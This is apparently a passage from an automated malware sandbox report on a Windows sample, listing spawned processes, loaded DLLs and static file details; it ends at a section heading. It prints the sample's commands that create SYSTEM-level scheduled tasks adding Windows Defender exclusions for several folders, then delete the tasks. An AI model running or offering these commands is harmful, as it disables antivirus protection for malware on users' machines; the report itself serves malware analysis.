              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Program Files (x86)\byHW9q\byHW9q.exe "C:\Program Files (x86)\byHW9q\byHW9q.exe"
              Source: unknownProcess created: C:\Program Files (x86)\x736Pg9\QmbK8U.exe "C:\Program Files (x86)\x736Pg9\QmbK8U.exe"
              Source: unknownProcess created: C:\Program Files (x86)\byHW9q\byHW9q.exe "C:\Program Files (x86)\byHW9q\byHW9q.exe"
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeProcess created: C:\Program Files (x86)\byHW9q\byHW9q.exe "C:\Program Files (x86)\byHW9q\byHW9q.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Delete /TN "Task1" /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /fJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c echo.>c:\xxxx.iniJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: pid.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: hid.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: vselog.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: vselog.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: twext.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: cscui.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: workfoldersshell.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: starttiledata.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: usermgrproxy.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: acppage.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: msi.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: aepic.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: tbcore3u.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: devenum.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: msdmo.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeSection loaded: apphelp.dll
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\x736Pg9\QmbK8U.exeSection loaded: tbcore3u.dll
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: uxtheme.dll
              Source: C:\Program Files (x86)\byHW9q\byHW9q.exeSection loaded: tbcore3u.dll
              Source: C:\Users\user\Desktop\2976587-987347589.08.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: C:\Users\user\Documents\XY3LL0.exeFile written: C:\Users\Public\Music\destopbak.iniJump to behavior
              Source: 2976587-987347589.08.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: 2976587-987347589.08.exeStatic file information: File size 30887936 > 1048576
              Source: 2976587-987347589.08.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58200
              Source: 2976587-987347589.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 2976587-987347589.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 2976587-987347589.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 2976587-987347589.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 2976587-987347589.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 2976587-987347589.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: 2976587-987347589.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 2976587-987347589.08.exe
              Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: XY3LL0.exe, 00000008.00000003.2222500406.0000000003FAE000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3239126887.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002A.00000002.3239456656.0000000000C9E000.00000004.00000020.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000000.2666597561.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002B.00000000.2687304360.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002B.00000002.2695070595.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, QmbK8U.exe, 0000002C.00000002.2710038033.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, QmbK8U.exe, 0000002C.00000000.2694474917.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, byHW9q.exe, 0000002F.00000002.2713673998.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 0000002F.00000000.2703249364.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, QmbK8U.exe, 00000030.00000002.3201537025.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, QmbK8U.exe, 00000030.00000000.3184324160.0000000000638000.00000002.00000001.01000000.0000000C.sdmp, byHW9q.exe, 00000031.00000000.3187483012.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe, 00000031.00000002.3203863917.00000000007D8000.00000002.00000001.01000000.0000000A.sdmp, byHW9q.exe.8.dr
              Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
              Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: 2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, XY3LL0.exe, 00000007.00000000.1996508363.0000000140014000.00000002.00000001.01000000.00000008.sdmp, XY3LL0.exe, 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmp, XY3LL0.exe, 00000008.00000000.2013520702.0000000140014000.00000002.00000001.01000000.00000008.sdmp
              Source: 2976587-987347589.08.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: 2976587-987347589.08.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: 2976587-987347589.08.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: 2976587-987347589.08.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: 2976587-987347589.08.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
